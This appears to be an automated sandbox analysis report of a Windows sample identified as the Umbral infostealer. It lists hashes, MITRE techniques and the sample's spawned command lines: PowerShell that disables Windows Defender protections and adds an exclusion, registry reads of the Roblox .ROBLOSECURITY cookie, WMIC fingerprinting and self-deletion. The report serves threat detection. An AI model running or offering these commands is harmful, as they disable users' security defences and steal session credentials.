Analysis
-
max time kernel
122s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
25-09-2024 03:27
Behavioral task
behavioral1
Sample
ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe
Resource
win7-20240903-en
General
-
Target
ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe
-
Size
229KB
-
MD5
7722bd38c1dc5357e24a8e33241b7609
-
SHA1
b4001c1953b0cb3e7acf2d6009342390f5e42724
-
SHA256
ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074
-
SHA512
215829e0897f1027944421cc2a2ed1122ab3fd8f1dea84631e7d22b27d9a7e61c0316f62762bfa90feb0dabec1e5389bb1b0b8bcc80b58b34cd910b2b52e5e86
-
SSDEEP
6144:lloZMQfsXtioRkts/cnnK6cMldA1GgGhZqZfiQBFUbGb8e1mji:noZItlRk83MldA1GgGhZqZfiQBFUup
Malware Config
Signatures
-
Detect Umbral payload 1 IoCs
resource yara_rule behavioral1/memory/2204-1-0x0000000000830000-0x0000000000870000-memory.dmp family_umbral -
pid Process 2692 powershell.exe 2776 powershell.exe 1632 powershell.exe 2812 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe -
Deletes itself 1 IoCs
pid Process 2612 cmd.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 6 ip-api.com -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2612 cmd.exe 1972 PING.EXE -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1936 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1972 PING.EXE -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2812 powershell.exe 2692 powershell.exe 2776 powershell.exe 2940 powershell.exe 1632 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe Token: SeDebugPrivilege 2812 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2776 powershell.exe Token: SeDebugPrivilege 2940 powershell.exe Token: SeIncreaseQuotaPrivilege 2024 wmic.exe Token: SeSecurityPrivilege 2024 wmic.exe Token: SeTakeOwnershipPrivilege 2024 wmic.exe Token: SeLoadDriverPrivilege 2024 wmic.exe Token: SeSystemProfilePrivilege 2024 wmic.exe Token: SeSystemtimePrivilege 2024 wmic.exe Token: SeProfSingleProcessPrivilege 2024 wmic.exe Token: SeIncBasePriorityPrivilege 2024 wmic.exe Token: SeCreatePagefilePrivilege 2024 wmic.exe Token: SeBackupPrivilege 2024 wmic.exe Token: SeRestorePrivilege 2024 wmic.exe Token: SeShutdownPrivilege 2024 wmic.exe Token: SeDebugPrivilege 2024 wmic.exe Token: SeSystemEnvironmentPrivilege 2024 wmic.exe Token: SeRemoteShutdownPrivilege 2024 wmic.exe Token: SeUndockPrivilege 2024 wmic.exe Token: SeManageVolumePrivilege 2024 wmic.exe Token: 33 2024 wmic.exe Token: 34 2024 wmic.exe Token: 35 2024 wmic.exe Token: SeIncreaseQuotaPrivilege 2024 wmic.exe Token: SeSecurityPrivilege 2024 wmic.exe Token: SeTakeOwnershipPrivilege 2024 wmic.exe Token: SeLoadDriverPrivilege 2024 wmic.exe Token: SeSystemProfilePrivilege 2024 wmic.exe Token: SeSystemtimePrivilege 2024 wmic.exe Token: SeProfSingleProcessPrivilege 2024 wmic.exe Token: SeIncBasePriorityPrivilege 2024 wmic.exe Token: SeCreatePagefilePrivilege 2024 wmic.exe Token: SeBackupPrivilege 2024 wmic.exe Token: SeRestorePrivilege 2024 wmic.exe Token: SeShutdownPrivilege 2024 wmic.exe Token: SeDebugPrivilege 2024 wmic.exe Token: SeSystemEnvironmentPrivilege 2024 wmic.exe Token: SeRemoteShutdownPrivilege 2024 wmic.exe Token: SeUndockPrivilege 2024 wmic.exe Token: SeManageVolumePrivilege 2024 wmic.exe Token: 33 2024 wmic.exe Token: 34 2024 wmic.exe Token: 35 2024 wmic.exe Token: SeIncreaseQuotaPrivilege 1680 wmic.exe Token: SeSecurityPrivilege 1680 wmic.exe Token: SeTakeOwnershipPrivilege 1680 wmic.exe Token: SeLoadDriverPrivilege 1680 wmic.exe Token: SeSystemProfilePrivilege 1680 wmic.exe Token: SeSystemtimePrivilege 1680 wmic.exe Token: SeProfSingleProcessPrivilege 1680 wmic.exe Token: SeIncBasePriorityPrivilege 1680 wmic.exe Token: SeCreatePagefilePrivilege 1680 wmic.exe Token: SeBackupPrivilege 1680 wmic.exe Token: SeRestorePrivilege 1680 wmic.exe Token: SeShutdownPrivilege 1680 wmic.exe Token: SeDebugPrivilege 1680 wmic.exe Token: SeSystemEnvironmentPrivilege 1680 wmic.exe Token: SeRemoteShutdownPrivilege 1680 wmic.exe Token: SeUndockPrivilege 1680 wmic.exe Token: SeManageVolumePrivilege 1680 wmic.exe Token: 33 1680 wmic.exe Token: 34 1680 wmic.exe -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 2204 wrote to memory of 2976 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 31 PID 2204 wrote to memory of 2976 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 31 PID 2204 wrote to memory of 2976 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 31 PID 2204 wrote to memory of 2812 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 33 PID 2204 wrote to memory of 2812 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 33 PID 2204 wrote to memory of 2812 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 33 PID 2204 wrote to memory of 2692 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 35 PID 2204 wrote to memory of 2692 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 35 PID 2204 wrote to memory of 2692 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 35 PID 2204 wrote to memory of 2776 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 37 PID 2204 wrote to memory of 2776 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 37 PID 2204 wrote to memory of 2776 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 37 PID 2204 wrote to memory of 2940 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 39 PID 2204 wrote to memory of 2940 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 39 PID 2204 wrote to memory of 2940 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 39 PID 2204 wrote to memory of 2024 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 41 PID 2204 wrote to memory of 2024 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 41 PID 2204 wrote to memory of 2024 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 41 PID 2204 wrote to memory of 1680 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 44 PID 2204 wrote to memory of 1680 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 44 PID 2204 wrote to memory of 1680 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 44 PID 2204 wrote to memory of 2484 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 46 PID 2204 wrote to memory of 2484 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 46 PID 2204 wrote to memory of 2484 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 46 PID 2204 wrote to memory of 1632 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 48 PID 2204 wrote to memory of 1632 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 48 PID 2204 wrote to memory of 1632 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 48 PID 2204 wrote to memory of 1936 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 50 PID 2204 wrote to memory of 1936 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 50 PID 2204 wrote to memory of 1936 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 50 PID 2204 wrote to memory of 2612 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 52 PID 2204 wrote to memory of 2612 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 52 PID 2204 wrote to memory of 2612 2204 ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe 52 PID 2612 wrote to memory of 1972 2612 cmd.exe 54 PID 2612 wrote to memory of 1972 2612 cmd.exe 54 PID 2612 wrote to memory of 1972 2612 cmd.exe 54 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2976 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe"C:\Users\Admin\AppData\Local\Temp\ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe"1⤵
- Drops file in Drivers directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2204 -
C:\Windows\system32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe"2⤵
- Views/modifies file attributes
PID:2976
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2812
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 22⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2776
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2024
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1680
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid2⤵PID:2484
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1632
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name2⤵
- Detects videocard installed
PID:1936
-
-
C:\Windows\system32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\ef2720e1c481bda488e8c2443102be2c4ef89bd1a8639c95591ecfa658c79074.exe" && pause2⤵
- Deletes itself
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2612 -
C:\Windows\system32\PING.EXEping localhost3⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1972
-
-
Network
MITRE ATT&CK Enterprise v15
Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD517421cd90e915baa02f5d4680ed6c679
SHA108f6fbe209a7f8f1143f707475e425c719ef5ebf
SHA256f46d139fdc0461a9cb5aab136d094b9e3ed2ec4a9edb645b16976cd91d8f551b
SHA5124bcc4d9f5aaaf83679b8955d68b12e32dcb29c3e0e1be0d5c911b9d614ff42b8425432db389176fa2f9bb9190c714fe492761c748111a2f4528f6de039e0a1b9